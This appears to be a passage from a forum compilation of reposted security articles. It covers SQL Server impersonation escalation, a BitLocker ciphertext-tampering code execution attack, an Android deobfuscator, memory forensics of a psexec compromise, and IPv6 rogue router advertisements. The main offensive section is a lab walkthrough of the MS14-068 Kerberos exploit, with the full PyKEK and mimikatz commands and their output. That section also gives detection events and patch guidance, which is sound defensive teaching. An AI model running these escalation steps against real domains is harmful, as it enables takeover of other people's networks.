.\Invoke-SqlServer-Escalate-ExecuteAs.psm1 [/TD] [/TR] [/TABLE] Then you can run it with the following command. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-code] Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword! [/TD] [/TR] [/TABLE] Below is a basic screenshot of what it looks like when it runs. [h=2]Alternatives to Impersonation[/h] There quite a few options for providing stored procedures with access to external resources without providing SQL logins with the privileges to impersonate other users at will. However, they all come with their own risks and implementation challenges. Hopefully, I’ll have some time in the near future to cover each in more depth, but below is a summary of common options. Create roles with the required privileges on external objects. This doesn’t always make least privilege easy, and can generally be a management pain. Use cross local/database ownership chaining. This one can end in escalation paths as well. More information can be found at cross db ownership chaining Server Configuration Option. Use EXECUTE WITH in the stored procedure to run as the stored procedure owner. This isn’t all bad, but can result in escalation paths if the store procedure is vulnerable to SQL injection, or is simply written to allow users to take arbitrary actions. Use signed stored procedures that have been assigned access to external objects. This seems like the most secure option with the least amount of management overhead. Similar to the EXECUTE WITH option, this can result in escalation paths if the store procedure is vulnerable to SQL injection, or is simply written to allow users to take arbitrary actions. More information at Tutorial: Signing Stored Procedures with a Certificate. [h=2]Wrap Up[/h] The issues covered in this blog/lab were intended to help pentesters, developers, and dev-ops gain a better understanding of how the IMPERSONATE privilege can be used an abused. Hopefully the information is useful. Have fun with it, but don’t forget to hack responsibly. [h=2]References[/h] EXECUTE AS Clause (Transact-SQL) REVERT (Transact-SQL) Sursa: https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/

Code Execution In Spite Of BitLocker Dec 8, 2014 Disk Encryption is “a litany of difficult tradeoffs and messy compromises” as our good friend and mentor Tom Ptacek put it in his blog post. That sounds depressing, but it’s pretty accurate - trying to encrypt an entire hard drive is riddled with constraints. For example: Disk Encryption must be really, really fast. Essentially, if the crypto happens slower than the disk read speed (said another way, if the CPU is a bottleneck) - your solution is untenable to the mass market It must support random read and write access - any sector may be read at any time, and any sector may be updated at any time You really need to avoid updating multiple sectors for a single write - if power is lost during the operation, the inconsistencies will not be able to be resolved easily, if at all People expect hard disks to provide roughly the amount of advertised space. Stealing significant amounts of space for ‘overhead’ is not feasible. (This goes doubly so if encryption is applied after operating system installation - there may not be space to steal!) The last two constraints mean that the ciphertext must be the exact same size as the plaintext. There’s simply no room to store IVs, nonces, counters, or authentication tags. And without any of those things, there’s no way to provide cryptographic authentication in any of the common ways we know how to provide it. No HMACs over the sector and no room for a GCM tag (or OCB, CCM, or EAX, all of which expand the message). Which brings us to… Poor-Man’s Authentication Because of the constraints imposed by the disk format, it’s extremely difficult to find a way to correctly authenticate the ciphertext. Instead, disk encryption relies on ‘poor-man’s authentication’. The best solution is to use poor-man’s authentication: encrypt the data and trust to the fact that changes in the ciphertext do not translate to semantically sensible changes to the plaintext. For example, an attacker can change the ciphertext of an executable, but if the new plaintext is effectively random we can hope that there is a far higher chance that the changes will crash the machine or application rather than doing something the attacker wants. We are not alone in reaching the conclusion that poor-man’s authentication is the only practical solution to the authentication problem. All other disk-level encryption schemes that we are aware of either provide no authentication at all, or use poor-man’s authentication. To get the best possible poor-man’s authentication we want the BitLocker encryption algorithm to behave like a block cipher with a block size of 512–8192 bytes. This way, if the attacker changes any part of the ciphertext, all of the plaintext for that sector is modified in a random way. That excerpt comes from an excellent paper by Niels Ferguson of Microsoft in 2006 explaining how BitLocker works. The property of changing a single bit, and it propagating to many more bits, is diffusion and it’s actually a design goal of block ciphers in general. When talking about disk encryption in this post, we’re going to use diffusion to refer to how much changing a single bit (or byte) on an encrypted disk affects the resulting plaintext. BitLocker in Windows Vista & 7 When BitLocker was first introduced, it operated in AES-CBC with something called the Elephant Diffuser. The BitLocker paper is an excellent reference both on how Elephant works, and why they created it. At its heart, the goal of Elephant is to provide as much diffusion as possible, while still being highly performant. The paper also includes Microsoft’s Opinion of AES-CBC Mode used by itself. I’m going to just quote: Any time you want to encrypt data, AES-CBC is a leading candidate. In this case it is not suitable, due to the lack of diffusion in the CBC decryption operation. If the attacker introduces a change d in ciphertext block i, then plaintext block i is randomized, but plaintext block i + 1 is changed by d. In other words, the attacker can flip arbitrary bits in one block at the cost of randomizing the previous block. This can be used to attack executables. You can change the instructions at the start of a function at the cost of damaging whatever data is stored just before the function. With thousands of functions in the code, it should be relatively easy to mount an attack. The current version of BitLocker [Ed: BitLocker in Vista and Windows 7] implements an option that allows customers to use AES-CBC for the disk encryption. This option is aimed at those few customers that have formal requirements to only use government-approved encryption algorithms. Given the weakness of the poor-man’s authentication in this solution, we do not recommend using it. BitLocker in Windows 8 & 8.1 BitLocker in Windows 8 and 8.1 uses AES-CBC mode, without the diffuser, by default. It’s actually not even a choice, the option is entirely gone from the Group Policy Editor. (There is a second setting that applies to only “Windows Server 2008, Windows 7, and Windows Vista” that lets you choose Diffuser.) Even using the commandline there’s no way to encrypt a new disk using Diffuser - Manage-BDE says “The encryption methods aes128_Diffuser and aes256_Diffuser are deprecated. Valid volume encryption methods: aes128 and aes256.” However, we can confirm that the code to use Diffuser is still present - disks encrypted under Windows 7 with Diffuser continue to work fine on Windows 8.1. AES-CBC is the exact mode that Microsoft considered (quoting from above) “unsuitable” in 2006 and “recommended against”. They explicitly said “it should be relatively easy to mount an attack”. And it is. As written in the Microsoft paper, the problem comes from the fact that an attacker can modify the ciphertext and perform very fine-grained modification of the resulting plaintext. Flipping a single bit in the ciphertext results reliably scrambles the next plaintext block in an unpredictable way (the rainbow block), and flips the exact same bit in the subsequent plaintext block (the red line): This type of fine-grained control is exactly what Poor Man’s Authentication is designed to combat. We want any change in the ciphertext to result in entirely unpredictable changes in the plaintext and we want it to affect an extremely large swath of data. This level of fine-grained control allows us to perform targeted scrambling, but more usefully, targeted bitflips. But what bits do we flip? If the disk is encrypted, don’t we lack any idea of where anything interesting is stored? Yes and no. In our testing, two installations of Windows 8 onto the same format of machine put the system DLLs in identical locations. This behavior is far from guarenteed, but if we do know where a file is expected to be, perhaps through educated guesswork and installing the OS on the same physical hardware, then we will know the location, the ciphertext, and the plaintext. And at that point, we can do more than just flip bits, we can completely rewrite what will be decrypted upon startup. This lets us do much more than what people have suggested around changing a branch condition: we just write arbitrary assembly code. So we did. Below is a short video that shows booting up a Virtual Machine showing a normal unmodified BitLockered disk on Windows 8, shutting it down and modifying the ciphertext on the underlying disk, starting it back up, and achieving arbitrary code execution. This is possible because we knew the location of a specific file on the disk (and therefore the plaintext), calculated what ciphertext would be necessary to write out desired shellcode, and wrote it onto the disk. (The particular file we chose did move around during installation, so we did ‘cheat’ a little - with more time investment, we could change our target to a system dll that hasn’t been patched in Windows Updates or moved since installation.) Upon decryption, 16 bytes were garbled, but we chose the position and assembly code carefully such that the garbled blocks were always skipped over. To give credit where others have demonstrated similar work, this is actually the same type of attack that Jakob Lell demonstrated against LUKS partitions last year. XTS Mode The obvious question comes up when discussing disk encryption modes: why not use XTS, a mode specifically designed for disk encryption and standardized and blessed by NIST? XTS is used in LUKS and Truecrypt, and prevents targeted bitflipping attacks. But it’s not perfect. Let’s look at what happens when we flip a single bit in ciphertext encrypted using XTS: A single bit change completely scrambles the full 16 byte block of the ciphertext, there’s no control over the change. That’s good, right? It’s not bad, but it’s not as good as it could be. Unfortunately, XTS was not considered in the original Elephant paper (it was relatively new in 2006), so we don’t have their thoughts about it in direct comparison to Elephant. But the authors of Elephant evaluated another disk encryption mode that had the same property: LRW provides some level of poor-man’s authentication, but the relatively small block size of AES (16 bytes) still leaves a lot of freedom for an attacker. For example, there could be a configuration file (or registry entry) with a value that, when set to 0, creates a security hole in the OS. On disk the setting looks something like “enableSomeSecuritySetting=1”. If the start of the value falls on a 16-byte boundary and the attacker randomizes the plaintext value, there is a 2?16 chance that the first two bytes of the plaintext will be 0x30 0x00 which is a string that encodes the ASCII value ’0’. For BitLocker we want a block cipher whose block size is much larger. Furthermore, they elaborate upon this in their comments to NIST on XTS, explicitly calling out the small amount of diffusion. A 16-byte scramble is pretty small. It’s only 3-4 assembly instructions. To compare how XTS’ diffusion compares to Elephant’s, we modified a single bit on the disk of a BitLockered Windows 7 installation that corresponded to a file of all zeros. The resulting output shows that 512 bytes (the smallest sector size in use) were modified: This amount of diffusion is obviously much larger than 16 bytes. It’s also not perfect - a 512 byte scramble, in the right location, could very well result in a security bypass. Remember, this is all ‘Poor Man’s Authentication’ - we know the solution is not particularly strong, we’re just trying to get the best we can. But it’s still a lot harder to pop calc with. Conclusion From talking with Microsoft about this issue, one of the driving factors in this change was performance. Indeed, when BitLocker first came out and was documented, the paper spends a considerable amount of focus on evaluating algorithms based on cycles/byte. Back then, there were no AES instructions built into processors - today there are, and it has likely shifted the bulk of the workload for BitLocker onto the Diffuser. And while we think of computers as becoming more powerful since 2006 - tablets, phones, and embedded devices are not the ‘exception’ but a major target market. Using Full Disk Encryption (including BitLocker in Windows 8) is clearly better than not - as anyone’s who had a laptop stolen from a rental car knows. Ultimately, I’m extremely curious what requirements the new BitLocker design had placed on it. Disk Encryption is hard, and even XTS (standardized by NIST) has significant drawbacks. With more information about real-world design constraints, the cryptographic community can focus on developing something better than Elephant or XTS. I’d like to thank Kurtis Miller for his help with Windows shellcode, Justin Troutman for finding relevant information, Jakob Lell for beating me to it by a year, DaveG for being DaveG, and the MSRC. Sursa: https://cryptoservices.github.io/fde/2014/12/08/code-execution-in-spite-of-bitlocker.html

Simplify Generic Android Deobfuscator Simplify uses a virtual machine to understand what an app does. Then, it applies optimizations to create code that behaves identically, but is easier for a human to understand. Specifically, it takes Smali files as input and outputs a Dex file with (hopefully) identical semantics but less complicated structure. For example, if an app's strings are encrypted, Simplify will interpret the app in its own virtual machine to determine semantics. Then, it uses the apps own code to decrypt the strings and replaces the encrypted strings and the decryption method calls with the decrypted versions. It's a generic deobfuscator becuase Simplify doesn't need to know how the decryption works ahead of time. This technique also works well for eliminating different types of white noise, such as no-ops and useless arithmetic. Before / After There are three parts to the project: Smali Virtual Machine (SmaliVM) - A VM designed to handle ambiguous values and multiple possible execution paths. For example, if there is an if, and the predicate includes unknown values (user input, current time, read from a file, etc.), the VM will assume either one could happen, and takes the true and false paths. This increases uncertainty, but maintains fidelity. SmaliVM's output is a graph that represents what the app could do. It contains every possible execution path and the register and class member values at each possible execution of every instruction. Simplify - The optimizer. It takes the graphs from SmaliVM and applies optimizations like constant propagation, dead code removal, and specific peephole optimizations. Demoapp - A short and heavily commented project that shows how to get started using SmaliVM. Building There is a bug with dexlib 2.0.3 which can cause Simplify to fail often. To work around, you must: Clone and build Smali Modify this line in smalivm/build.gradle to point to the built jar, if different: compile files('../../smali/dexlib2/build/libs/dexlib2-2.0.3-dev.jar') Sorry for this step. It won't be necessary once updated dexlib is released. To build the jar, use ./gradlew shadowJar Sursa: https://github.com/CalebFenton/simplify

Analyzing Malicious Processes Posted on 2013/11/11 by jackcr Today I tweeted “Analysis techniques are individually developed. Show people processes and let them be creative”. SO I wanted to write this post to describe a method I use to analyze processes on hosts that are suspected of being compromised. When attackers gain access to your network they will need to perform certain activities in order to accomplish their goals. Very often these activities will result in executables being ran and processes started as a result. Identifying these processes is very important, but what do you do after is where you begin to earn your money. For this post I will be using a memory image from the jackcr-challenge which I created last year. If you are interested in tackling this challenge it can be downloaded from the link on the right side bar or you can follow this link https://docs.google.com/file/d/0B_xsNYzneAhEN2I5ZXpTdW9VMGM/edit. When looking at processes pay attention to the start times. We should be focusing on ones that have started around the same time frame that we are investigating (if the machine has been rebooted after the initial compromise then this method will obviously not work). Remember that attackers will very often leverage windows tools so don’t discount processes that seem like they would be non-malicious just because it was executed from a legitimate Microsoft executable. It’s also a good idea to pay attention to spawned processes as well a parent processes. If cmd.exe was spawned from iexplore.exe it may be cause for some concern. Looking at our memory image we start by inspecting the process listing. The above command will display the following output. At first glance the cmd.exe process may seem a little suspicious but is was spawned from explorer.exe and is responsible for mdd.exe which collected the memory dump. The PSEXECSVC.exe process looks a little suspicious though. When psexec.exe is executed on a client machine it will copy the psexecsvc.exe binary over a smb connection to the destination and start a service as well as create a named pipe in which commands will be executed over. This may very well be an admin performing maintenance on the server, but not knowing for sure warrants investigation. The first thing I will want to look at are the ip’s that have been communicating to this machine on ports 135 and 445 since I know psexec communicates over these. As these connections may not be established any longer I will use the Volatility plugin, connscan, which has the ability to locate closed tcp connections as it scans for _TCPT_OBJECTS which may still reside in memory. Based on the output we have 3 machines that we may need to validate and possibly investigate after performing analysis on this machine. We will also use these ip’s when analyzing the process strings. Before looking at the strings I want to look at the open handles to the process as it may give some clues to additional items that may need to be investigated. At this point I mainly want to look at open file handles. The above command will produce the following output. We can see the named pipe created by the execution of psexec on the client machine, but not really anything else that would steer my investigation. The output can be large so I initially like to start with a smaller subset that I think may give some results I’m looking for. At this point I will broaden my search to see if I can find anything else of interest. We can see in the below output that we have a hostname that’s tied to this process. If this turns out to be a malicious process we will need to immediately contain that host to prevent further lateral movement and investigate for additional compromises. As processes start, the operating system will allocate up to 2GB of virtual address space for that process to execute in. I like to think of processes as a container of activity. If I specifically look at that container I should see activity that is directly related to the activity I’m looking for. This is important because when looking at memory strings it’s very easy to to find things that look really bad only to find out that they are part of an AV signature or part of a legitimate connection. It is also much easier to analyze a small section of memory than the entire memory dump. Using the volatility plugin memdump we can dump the entire contents of a process into a binary file. We should create a strings file with both ascii and unicode strings as it’s much faster to grep through ans ascii file than a binary file. By default I like to prepend each string with the byte offset incase I need to locate that string in the dump file. We can use the following 2 commands to produce this file. Very often when attackers want to execute commands on compromised machines they will create batch scripts to perform these tasks. Just searching the strings file for “echo off” we are able to, not only confirm that this host is compromised, but gain insight into what happened on this machine as well as identify indicators to look for on our network. The 3 batch scripts identified performed the following actions: 1. Rar’d up the contents of C:\Engineering\Designs\Pumps 2. Created a scheduled task to copy wc.exe to the system32 directory and execute it at 04:30 3. Collected system information and directed the output to the file system.dll Searching the process data for the ip’s I was able to locate these log files in memory indicating a login to this machine using the sysbackup account which was the same username identified in the batch script. The host that initiated the login was also the host identified in the handles output. Knowing that this machine is confirmed compromised there are some additional actions we must take in hopes of limiting the scope of the incident. 1. Search network for any directories named webui in the system32 directory 2. Attempt to locate wc.exe in memory or on the host itself to determine capabilities (typicaly locating in memory would be much faster then collecting on the host). 3. Collect and analyze data from 3 ip’s seen making port 445 connections 4. Search network for presence of wc.exe, ra.exe, system.dll 5. Search logs for 540 / 4624 type 3 logon attempts from suspicious ip’s as well as machines using the sysbackup account. 6. Change the sysbackup credentials as well as all user credentials on the compromised machines (domain and local) 7. Determine what files were rar’d 8. Look for possible data exfil in network traffic There is a lot of additional data in these memory images and I encourage you to have a look at them if you’ve not already done so. Again I hope this helps somebody out there and let me know if you have any questions or comments. Sursa: Analyzing Malicious Processes

Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK) by Sean Metcalf MS14-068 References: AD Kerberos Privilege Elevation Vulnerability: The Issue Detailed Explanation of MS14-068 MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK) After re-working my lab a bit, I set about testing the MS14-068 POC that Sylvain Monné posted to GitHub a few days ago. I configured a Windows 7 workstation with Python 2.7.8 and downloaded the PyKEK zip as well as the Mimikatz zip file. The MS14-068.py Python script (part of PyKEK) can be run on any computer that has connectivity to the target Domain Controller. I ran PyKEK against a Windows Server 2008 R2 Domain Controller not patched for MS14-068 using Kali Linux as well as a domain-joined Windows 7 workstation. Interesting side note: I also stood up one Windows Server 2012 and one Windows Server 2012 R2 Domain Controller in the same site as the two unpatched Windows Server 2008 R2 DCs. None of the Domain Controllers in my lab.adsecurity.org AD Forest are patched for MS14-068. After successfully running the PyKEK script to generate the TGT, I was unable to get a TGS successfully to exploit the 2008 R2 DC. After shutting down the 2012 & 2012R2 DCs, I could use the forged TGT to get a TGS and access the targeted 2008 R2 DC (ADSDC02). I will be looking into this more later this week. 12/8 Update: I added a Mitigation section at the end of the post as well as events from a patched Domain Controller when attempting to exploit (in the events section). Staging the Attack: The targeted user account in this post is “Darth Sidious” (darthsidious@lab.adsecurity.org). Note that this user is a member of Domain Users and a Workstation group. This group membership stays the same throughout the activity in this post (I took the screenshot after exploiting the DC). Assume that this user is an authorized user on the network and wants to get Domain Admin rights to perform nefarious actions. The user already has a valid domain account and knows the password for the domain. This is no different from an attacker spearphishing this user and stealing their credentials as they get local admin rights on the computer. Once the attacker has valid domain credentials and local admin rights on a computer on the network, they can leverage PyKEK to generate a forged TGT by performing standard communication with the target (unpatched) DC. The PyKEK ms14-068.py Python script needs some information to successfully generate a forged TGT: User Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org User Password [-p]: TheEmperor99! User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-222232912 7-1110 Targeted Domain Controller [-d]: adsdc02.lab.adsecurity.org The SID can be found by running the “whoami” command while logged in as the target user. You can also get this information from PowerShell by running : [security.Principal.WindowsIdentity]::GetCurrent( ) As I noted in my previous post on PyKEK, the following group membership is included in the forged TGT: Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) Phase 1: Forging a TGT: Here’s a screenshot of the exploit working in Kali Linux (1.09a) After generating the ccache file containing the forged and validated TGT Kerberos ticket, the ccache file can be copied to a Windows computer to run Mimikatz. It works well on Windows running Python as well (command is in bold & italics). c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912 7-1110 -d adsdc02.lab.adsecurity.org [+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done! [+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done! [+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done! [+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done! [+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done! [+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done! [+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done! [+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done! [+] Creating ccache file ‘TGT_darthsidious@lab.adsecurity.org.ccache’… Done! Here’s the screenshot of the ms14-068 exploit working on Windows. I ran WireShark on the targeted Domain Controller. Here’s the pcap (zipped) of the network traffic from the PyKEK ms14-068.py script: ADSecurityOrg-MS14068-Exploit-KRBPackets Note that I have generated a forged TGT with a single, stolen domain account. The next step is to use this forged TGT, so I logon to a computer as the local admin account with network access to the targeted Domain Controller. Whoami shows I am logged on as admin on the computer ADSWKWIN7. Klist shows there are no Kerberos tickets in memory for this user (there wouldn’t be, this is a local admin account). The PyKEK ms14-068.py Python script saves the forged TGT to a ccache file (TGT_darthsidious@lab.adsecurity.org.ccache) in the current working directory (c:\temp\pykek shown above) Phase 2: Injecting the forged TGT and gaining a valid TGS: After the forged Kerberos TGT ticket is generated, it’s time to inject it into the current user session using Mimikatz (command is in bold & italics). c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe “kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache” exit .#####. mimikatz 2.0 alpha (x64) release “Kiwi en C” (Nov 20 2014 01:35:45) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ‘## v ##’ mimikatz | Blog de Gentil Kiwi (oe.eo) ‘#####’ with 15 modules * * */ mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG Data 0 Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000017 – rc4_hmac_nt af5e7b47316c4cebae0a7ead04059799 Ticket : 0x00000000 – null ; kvno = 2 […] * Injecting ticket : OK mimikatz(commandline) # exit Bye! Note that since I am injecting the forged TGT which states that I am a member of Domain Admins, Enterprise Admins, etc into my session, when this TGT is passed to an unpatched DC for a Kerberos service ticket (TGS), the service ticket will show I am a member of these groups. When the TGS is presented to a service, the user account is treated as if it is a member of these groups, though viewing the group membership shows the user is conspicuously absent. This enables an attacker to act as if they are a member of groups when they are not. I ran WireShark on the targeted Domain Controller. Here’s the pcap (zipped) of the network traffic using the forged TGT ticket via Mimikatz and connecting to the Domain Controller’s Admin$ share: ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access Once I have successfully injected the forged TGT into my session (remember, I am logged onto a domain-joined Windows 7 computer as the local admin – not with AD domain credentials), I leverage this to connect to the Domain Controller and gain access to the Active Directory database (ntds.dit). Domain Controller Event Logs from the Attack: Here are the event logs on the targeted Domain Controller when using the forged TGT to get a TGS in order to access the Domain Controller’s admin$ share and locate the AD database files: Event 4769 shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT. Event 4769 shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT. Event 4624 shows darthsidious@lab.adsecurity.org using the TGS service ticket to logon to the target Domain Controller. Event 5140 shows darthsidious@lab.adsecurity.org using the TGS service ticket to connect to the target Domain Controller’s Admin$ share (net use \\adsdc02.lab.adsecurity.org\admin$) which only an administrator has access. Event 4672 shows darthsidious@lab.adsecurity.org successfully authenticated (and logged on to) the target Domain Controller which only an administrator has access. Note that this user has SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeTakeOwnership, etc showing the user has full Admin access to this computer. It’s Game Over at this point. Here’s what it looks like when a client attempts to use a forged TGT to get a Kerberos service ticket (TGS) when communicating with a patched DC: Event 4769 shows darthsidious@lab.adsecurity.org attempting to get a Kerberos service ticket (TGS) for a CIFS (SMB) share on the Domain Controller (adsdc01.lab.adsecurity.org). The TGS fails because the DC (adsdc01.lab.adsecurity.org) is patched an logs this failure in the security event log as a failed 4769 event. . NOTE: This is the event Microsoft recommends you monitor closely after applying KB3011780 (the MS14-068 patch). Event 4776 shows an audit failure for the computer and the username logged into the computer. This event is associated with the 4769 event above. Since I was logged on as the local administrator account “admin” it shows in the log. This is a red flag. However, I could have created a local admin account on the box with the same name as a Domain Admin in the domain and it may not be scrutinized as much. Check your logs! Note: There should only be minor differences in performing any of these actions from a non-domain joined computer. This concludes the lesson on how to own an Active Directory forest in less than 5 minutes with only a user account and a connected Windows computer (and associated admin account). Mitigations: Patch all Domain Controllers with KB3011780 in every AD domain. I uploaded a sample script for getting KB3011780 patch status for all Domain Controllers: Get-DCPatchStatus (change file extension to .ps1) [UnPatched DCs] Monitor event ID 4672 for users who are not members of domain-level admin groups (default groups able to logon to Domain Controllers – this is why you shouldn’t use these default, built-in groups for delegation of administration): Enterprise Admins (admin on all DCs in the forest), Domain Admins Administrators Server Admins Backup Operators Account Operators Print Operators Other groups delegated in your environment to logon to Domain Controllers [Patched DCs], monitor event id 4769 Kerberos Service Ticket Operation event which shows failed attempts to get Kerberos service tickets (TGS). References: MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK) Mimikatz and Active Directory Kerberos Attacks MS14-068: Active Directory Kerberos Vulnerability Patch for Invalid Checksum Kerberos Vulnerability in MS14-068 Explained MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege The Python script MS14-068 POC code: Python Kerberos Exploitation Kit (PyKEK) Benjamin Delpy’s blog (Google Translate English translated version) Mimikatz GitHub repository Mimikatz Github wiki Mimikatz 2 Presentation Slides (Benjamin Delpy, July 2014) All Mimikatz Presentation resources on blog.gentilkiwi.com Sursa: Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)

Why You Must Use ICMPv6 Router Advertisements (RAs) Posted on June 16, 2014 - 05:14:52 PM by Scott Hogg When a dual-protocol host joins a network it sends an ICMPv6 (type 133) Router Solicitation (RS) message to inquire about the local IPv6-capable router on the network. The local router is tuned into the ff02::2 (all-router’s multicast group address) and will receive the RS message. In response to the RS, the router immediately sends an ICMPv6 (type 134) Routing Advertisement (RA) message to the all nodes on the network (ff02::1, the all nodes multicast group address). The router also sends the RA messages periodically (typically every 200 seconds) to keep the nodes informed of any changes to the addressing information for the LAN. The RA message contains important information for nodes as well as which method they should use to obtain their IPv6 address. The RA contains several flags that are set that the nodes watch for and use. A-bit – Autonomous Address Autoconfiguration Flag tells the node it should perform stateless address assignment (SLAAC RFC 4862) L-bit – On-Link Flag tells the node that the prefix listed in the RA is the local IPv6 address M-bit – Managed Address Config Flag tells the host if it should use stateful DHCPv6 (RFC 3315) to acquire its address and other DHCPv6 options O-bit – Other Config Flag tells the host that there is other information the router can provide (such as DNS information defined in Stateless DHCPv6 (RFC 3736)) ICMPv6 RAs are intended to help facilitate bootstrapping the connectivity of an IPv6 node on a network. They tell the hosts on the LAN how they should go about acquiring their global unicast IPv6 address and become productive members of the network. The RA also provides the end-node information about the local router and its ability to be the default gateway. This process is well documented in Section 4 of the IETF RFC 4861 “Neighbor Discovery for IP version 6 (IPv6)”. Unfortunately, there are some security risks related to ICMPv6 RA messages. On networks that do not yet use IPv6, the dual-stack hosts sit dormant waiting for an eventual RA message to awaken their IPv6 connectivity. An attacker can craft a “rogue RA” message on these networks, get the dual-protocol nodes on the network to configure their IPv6 addresses and utilize the attacker’s system as their default gateway. The attacker can then easily perform a Man-In-The-Middle (MITM) attack without the user’s knowledge using this technique. This issue is documented in RFC 6104 “Rogue IPv6 Router Advertisement Problem Statement”. On networks that already have IPv6 running, rogue RAs can destabilize the network (and still perform a MITM attack). Rogue RA messages can be easily generated with The Hacker’s Choice IPv6 Attack Toolkit, Scapy, SI6 Networks IPv6 Toolkit, Nmap, and Evil FOCA, among other tools and methods. There are methods to detect and block these rogue RA messages. Utilities like NDPMon, Ramond, 6MoN, and others can be used to look for suspicious Neighbor Discovery Protocol (NDP) packets and detect invalid RA messages. These tools function much like the old ARPWATCH program did for detecting ARP attacks on an IPv4 LAN. There is a technique called “RA Guard” that can be implemented in an Ethernet switch to permit legitimate RAs from a valid router and block the malicious rogue RA messages. This technique is documented in IETF RFC 6105 “IPv6 Router Advertisement Guard”. There is also a very new RFC 7113 “Implementation Advice for IPv6 Router Advertisement Guard (RA-Guard)”. A good example of improved first hop security (FHS) in IPv6 can be implemented in Cisco switches. Unfortunately, there are also methods to avoid any rogue RA detection accomplished by NDP security methods. Finding the ICMPv6 layer-4 header information could be made difficult by forcing the system to fully parse the IPv6 header structure. An attacker can change the location of the RA in the IPv6 packet by using extension headers to avoid detection especially if security tools do not parse the entire RA message. If an end-node receives an RA with a hop-by-hop extension header or an atomic fragment, the host disregards the header but still processes the RA normally. This rogue RA attack is called “RA guard evasion”. Legitimate RA messages should not include fragmentation or other headers. There is some additional guidance along these lines documented in RFC 6980 “Security Implications of IPv6 Fragmentation with IPv6 Neighbor Discovery”. There are other beneficial uses of ICMPv6 RA messages on a LAN. Another method of getting DNS information to IPv6 nodes is to leverage options within the RA to send the DNS server and domain search list. Nodes that receive the RA can simply parse these options and get this DNS information and use it with their SLAAC auto-generated IPv6 addresses. IETF RFC 6106 "IPv6 Router Advertisement Options for DNS Configuration" defines the Recursive DNS Server (RDNSS) and DNS Search List (DNSSL) options within Router Advertisement (RA). One of the challenges with RDNSS is getting support for it natively in the host operating systems. This link provides some information on which OSs support this option. There is also a RDNSS deamon for Linux (rdnssd). Even if you intend to use DHCPv6 instead of SLAAC in your environment, you still need RA messages to function on the local LAN. The RAs provide the default gateway information to an end node and, with the M-bit, inform the nodes that the LAN uses stateful DHCPv6. DHCPv6 does not currently have an option to provide this information to the DHCPv6 client in the same way it is provided with DHCP for IPv4. Providing the default gateway as a DHCPv6 option was proposed, but never made it into the standards. DHCPv6 may be desirable in the desktop access portions of an enterprise network and DHCPv6 is absolutely essential in the service provider’s subscriber access networks. However, organizations may not need DHCPv6 in a data center environment. Most organizations will prefer to statically configure IPv6 address parameters on specific systems in the network environment. Static address configuration may be preferred for systems that need to have a fixed, non-changing IPv6 address or for nodes that are unable to perform dynamic address assignment. The systems in the networks that will most likely use this static IPv6 addressing technique are servers and systems within data center environments. These servers could be on an internally-accessible networks, private/hybrid cloud infrastructures, or Internet publically-accessible network. Any system that is going to have its address used in some form of firewall policy or access-control list will need a static address. Servers within a data center environment would need to be configured with the following information to be able to operate correctly in an IPv6 environment Static IPv6 address for its network interface This address would be allocated from the IPAM system and registered within the DNS system with an AAAA resource record and an accompanying PTR record. Static IPv6 default gateway This could either be a global unicast address of the first-hop router or the Link-Local address of the first-hop router (e.g. FE80::1). Static DNS server This is the caching DNS resolver this system will use when it needs to perform DNS queries (e.g. configured within the /etc/resolv.conf) DNS Domain Name This is the domain name that the system will use in combination with the server's hostname to create its fully-qualified domain name (FQDN) (e.g. the domain suffix search order list) Typically, servers will have a static IPv6 address assigned, But they will still use the information contained in the ICMPv6 (type 134) Router Advertisement (RA) message sent by the first-hop router to learn information about the default gateway. RA messages contain the link-local address and the layer-2 (MAC) address of the first-hop router. Servers can listen to these and use this information to auto-configure their default gateway. If you want to disable sending of RA messages on a Cisco IOS router, you can use the following commands to accomplish this goal. interface GigabitEthernet 0/12 ipv6 address 2001: db8:1234:5678::1/64 ipv6 nd prefix no-autoconfig ipv6 nd suppress-ra ipv6 nd ra suppress all It is important to realize how important the ICMPv6 RA message is to the function of an IPv6-enabled LAN. Security risks exist, but the attacker must be on-net or have compromised a node on the network to be able to perform these rogue RA MITM 